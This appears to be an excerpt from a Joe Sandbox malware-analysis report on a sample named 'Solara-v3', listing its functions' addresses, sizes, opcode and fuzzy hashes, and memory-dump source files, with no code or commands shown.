                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: G9
                                                                                                                                                                                                                                              • API String ID: 0-2716091189
                                                                                                                                                                                                                                              • Opcode ID: 2fc45742e1a3686705e5dce742a14d5a280d3b57a4ce65dfcae4e6ba49c632fe
                                                                                                                                                                                                                                              • Instruction ID: 3b5bd5877d33dc8e27cd9c087e0f9001335ca5b0b3d528c35a28b92a38c22519
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fc45742e1a3686705e5dce742a14d5a280d3b57a4ce65dfcae4e6ba49c632fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7412A736483118BD728CF14CC5176BB7B2EFC5310F0A5A2CE48567790E7789904D74A
                                                                                                                                                                                                                                              Function 0042904E Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Dkpk
                                                                                                                                                                                                                                              • API String ID: 0-2230318481
                                                                                                                                                                                                                                              • Opcode ID: cf1a1df2cccf502249e80f8767bee934b3f81d63e9dce52cdd7222a5ef567c20
                                                                                                                                                                                                                                              • Instruction ID: 1d401ccbc5330020b48fc023e4a699b76f3f91e523f4b1a7854651c222232fa2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf1a1df2cccf502249e80f8767bee934b3f81d63e9dce52cdd7222a5ef567c20
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C031E076A083128BC7109F5AD85266BB3F2EFC6350F05882DE6D19B361EB38DC10C75A
                                                                                                                                                                                                                                              Function 00440400 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: yJA
                                                                                                                                                                                                                                              • API String ID: 2994545307-2938920004
                                                                                                                                                                                                                                              • Opcode ID: 84be69a13e54c4aed9f449a33fb6588dae3e98482a0fb2b9d7165eec0b47645c
                                                                                                                                                                                                                                              • Instruction ID: 23d227faf8ce9b4e26db9de62984c8614510f8221fb2136dd27611cc46179942
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84be69a13e54c4aed9f449a33fb6588dae3e98482a0fb2b9d7165eec0b47645c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9218779B142005BE7148F14DC80ABFB3A6FBC5324F18853DEB80873A5DA399921C759
                                                                                                                                                                                                                                              Function 0040C158 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: |X|X
                                                                                                                                                                                                                                              • API String ID: 0-2218283020
                                                                                                                                                                                                                                              • Opcode ID: 4e5c2659c129e1988177d5d496e4e7676c33d3dde831d9fe778a2e42bff78039
                                                                                                                                                                                                                                              • Instruction ID: cac40e2581ff872ab27a598a1b45c8296db47ebe279b368b7e4a74499d8b646e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e5c2659c129e1988177d5d496e4e7676c33d3dde831d9fe778a2e42bff78039
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA1190BAE006229BC711CF68CC81BAAF3B1BF49700F025225E959FB360D671ED528794
                                                                                                                                                                                                                                              Function 00407410 Relevance: .6, Instructions: 625COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
                                                                                                                                                                                                                                              • Instruction ID: d874bbcf5e1159c85269ce196b50d6e2d62d6b3305aebcbcfe8904bc07c1c355
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8622A272A087118BC725DF18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8518B47
                                                                                                                                                                                                                                              Function 004386C0 Relevance: .5, Instructions: 513COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2d3c62a6e4de999ed87ef6fc42ba95c8b3b0a48b33c1ed109eb8fbf5ecc21169
                                                                                                                                                                                                                                              • Instruction ID: ed87f8f56d2034feecb16addb3c1d7f4234c8264b3b86d2c62e2f9d85163fe5b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d3c62a6e4de999ed87ef6fc42ba95c8b3b0a48b33c1ed109eb8fbf5ecc21169
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEE12572A083158BE714DE25C98076BF3D2BFC8304F15A53DF98867391DB79AC06879A
                                                                                                                                                                                                                                              Function 0041B729 Relevance: .5, Instructions: 502COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 81df7370a673775438192dc4c9e14377fa855e1243d58cad9bd2d063f4e90178
                                                                                                                                                                                                                                              • Instruction ID: f5ba16966c3e101888b7bca72879cdb3ad45e943e1706bf8361143ff5552ba76
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81df7370a673775438192dc4c9e14377fa855e1243d58cad9bd2d063f4e90178
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38E1F474600601CBC729CF29C4916B3B7F2FF9A310719855ED4968F7A6E738E881CB99
                                                                                                                                                                                                                                              Function 00425A90 Relevance: .4, Instructions: 414COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 37ca8b8b3c6ed410c19b2c03abc9ee81bf72cecb125f83273075474e56802f73
                                                                                                                                                                                                                                              • Instruction ID: 88bd832e139d41634c66c7e56a057755965ae3d8a41c3c510fb752d64a63a0a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37ca8b8b3c6ed410c19b2c03abc9ee81bf72cecb125f83273075474e56802f73
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CE111B5608314DFD720DF64E891B6BB7E1FBA6308F81893EF5858B2A0D7749805CB46
                                                                                                                                                                                                                                              Function 00422140 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5136a095a2ea78d221fcadaa032206e0a687433376e0ab07b55045eaa6b7e3bc
                                                                                                                                                                                                                                              • Instruction ID: 3a6bf685c77663f863f8a5aa86c54eb2a31b14798c22e02175e5ecf7feff1080
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5136a095a2ea78d221fcadaa032206e0a687433376e0ab07b55045eaa6b7e3bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42A12371A04321ABD710DF24E95276BB3A0FF94314F85452AED859B391E3BCED41C39A
                                                                                                                                                                                                                                              Function 0043F780 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: f3263b6494e4807a421ff46442ba8fa50b4497d4b6464c460086b30a21c1aa25
                                                                                                                                                                                                                                              • Instruction ID: 9ebdb03625680536fcb291a839db870c85765b0a47897c3b7d115d578eec363d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3263b6494e4807a421ff46442ba8fa50b4497d4b6464c460086b30a21c1aa25
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8A1E275A083219BCB28DF18C89066BB3E2BF88310F15953DE9D99B3A1E775EC05C785
                                                                                                                                                                                                                                              Function 0043F450 Relevance: .3, Instructions: 306COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: ac21b3154371b9123b6cf7eb29276aeded3cff8d4f0c9c4ebdc798624198afa3
                                                                                                                                                                                                                                              • Instruction ID: eb6c137914190778cc39401c3b1ae89dfde7721dc61adad6eda297e009315b74
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac21b3154371b9123b6cf7eb29276aeded3cff8d4f0c9c4ebdc798624198afa3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F891D2396083119BC728DF18C99192BB3E2FF98710F15953DE9858B361EB35EC16CB85
                                                                                                                                                                                                                                              Function 0042BD77 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 73c5540b047db511690bcec2d5be8477da0bf30420e7a3d2e4d17ab541a095ee
                                                                                                                                                                                                                                              • Instruction ID: fdfd5630cbfef5ef22e4fdbb6b9e2235d5d7d2952f6c86c7509a691c573987a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73c5540b047db511690bcec2d5be8477da0bf30420e7a3d2e4d17ab541a095ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0715A72A083618BD3188F25986133BBBD1DFD2704F69886EE4D69B391D7798805CB46
                                                                                                                                                                                                                                              Function 0042BE3B Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7beb77718832f912f93dec333d0382bf07e2159cb3fb380175e515cb799c5fa6
                                                                                                                                                                                                                                              • Instruction ID: 30c9fa131dfd827492eb9a81449ae176163bcae57c035aca38747d46e10efa6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7beb77718832f912f93dec333d0382bf07e2159cb3fb380175e515cb799c5fa6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C714871A083A18BD3188F35986133BBBD1DFD2704F69886EE4D69B391D7798805CB86
                                                                                                                                                                                                                                              Function 0042BE9D Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fbc837b4b3cb6af37b41f583372a8404740e5a4fdc6351e5068ac917573e76a8
                                                                                                                                                                                                                                              • Instruction ID: a61e00984761ba80395561639032770b7f585e41462ff11f5500d416fb78d726
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbc837b4b3cb6af37b41f583372a8404740e5a4fdc6351e5068ac917573e76a8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32616C726083618BD3188F35D86137BBBD1DFD2704F68886DE4D19B391D67D8805CB46
                                                                                                                                                                                                                                              Function 0041C119 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6b3a3048a4542faa0e292eaec23e2d8fcf88195d61b68d57c05e6f9fa7b3e697
                                                                                                                                                                                                                                              • Instruction ID: 7a7230bd175fe8df77bf71d9a9d70d43fbaba0e463c2f5fb034005e811d22f28
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b3a3048a4542faa0e292eaec23e2d8fcf88195d61b68d57c05e6f9fa7b3e697
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC819FB0910B009FC324EF39C946123BBF1FF56300B548A6EE8D64B795E335A495CB96
                                                                                                                                                                                                                                              Function 0042BE86 Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7e91b1f93db6604f0e1f47c5d94589793502ad60c2ebaf338f96a8d2dc823a3a
                                                                                                                                                                                                                                              • Instruction ID: c958039b7f324a70f14877e38d7e87bb170a8ceb339f658c132a5929e586524f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e91b1f93db6604f0e1f47c5d94589793502ad60c2ebaf338f96a8d2dc823a3a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9514872A183A18BD3188F25D8A137BBBD19FD2704F68886DE4D19B391D2798805CF56
                                                                                                                                                                                                                                              Function 0041C3F4 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0ebcfdce4285e189d9b6b4f3cb4784d52b0f09d6a1c2b672a180d182182b0bd1
                                                                                                                                                                                                                                              • Instruction ID: 09ac1d0a9713e752f4627eff734c4282fb3d1a19a84e1ba2698046d2faa5f02a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ebcfdce4285e189d9b6b4f3cb4784d52b0f09d6a1c2b672a180d182182b0bd1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3051F6B05147219BD724CF29C841263B7F3FFA5300754861DD4968B764E73AF492CB99
                                                                                                                                                                                                                                              Function 00440650 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: b1b17e811ad84c02a75428410a430e784aaf74558106e518f534b17a2e8755fd
                                                                                                                                                                                                                                              • Instruction ID: 99dc13c7fbb656e8e593b4c013347aff3b0bffb19504d9c0fb3df3c2b29b5b1a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1b17e811ad84c02a75428410a430e784aaf74558106e518f534b17a2e8755fd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 264133782583009BE7148F14DD81B7BB3A6EBC4314F28453EE285973A0DA79BC218B0A
                                                                                                                                                                                                                                              Function 00424CCD Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5c06d3715020c9e906dd8f3ea95b00d607807413e7af719e77faa20cdb60b4cb
                                                                                                                                                                                                                                              • Instruction ID: ea4754be5dd7e8cf826f622dde6b3e998fbc03a804596390a98b67661fe1b0f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c06d3715020c9e906dd8f3ea95b00d607807413e7af719e77faa20cdb60b4cb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64412579E10221DBDB18CF28E9016AAB3F2FF8A300F159579C845E3755DB385914CB84
                                                                                                                                                                                                                                              Function 0043B450 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cff4c8bf935c6f11034f3282e146f2a6c370e0ca8f0a63124d1a240452eb4176
                                                                                                                                                                                                                                              • Instruction ID: 20d5841960d25e88823685a0e503dee0d7ec10e54da16e755c7071827351d428
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cff4c8bf935c6f11034f3282e146f2a6c370e0ca8f0a63124d1a240452eb4176
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20312272A09210AFD710CF19C94476BB3E5EFD8708F05982DE988AB310D3769D06CBCA
                                                                                                                                                                                                                                              Function 0043DC5E Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 807bec0362dbcb8b1f2841beb8f7528c0114618da1fc548bdf9fe4127f2aab19
                                                                                                                                                                                                                                              • Instruction ID: 5a3520f55d16dba99afe4212a530fbd96f219d62ced46578b1605fced0d3a66b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 807bec0362dbcb8b1f2841beb8f7528c0114618da1fc548bdf9fe4127f2aab19
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97310572F506258BDB1CCFADCC523FFB6A2AB89304F18512ED946E7790CA7859018794
                                                                                                                                                                                                                                              Function 0041BD8F Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
